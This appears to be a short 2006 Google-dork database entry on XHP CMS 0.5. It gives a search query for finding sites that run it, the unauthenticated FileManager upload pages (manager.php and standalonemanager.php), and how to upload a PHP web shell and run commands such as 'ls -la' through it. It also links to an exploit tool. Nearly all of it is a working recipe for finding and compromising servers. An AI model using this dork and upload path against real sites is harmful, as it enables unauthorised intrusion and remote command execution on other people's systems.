Google Search: “Powered by XHP CMS” -ihackstuff -exploit -xhp.targetit.ro
rgod rates this entry 10 out of 10.
Submitted: 2006-03-28 00:00:00
Added by: rgod
tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside… after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html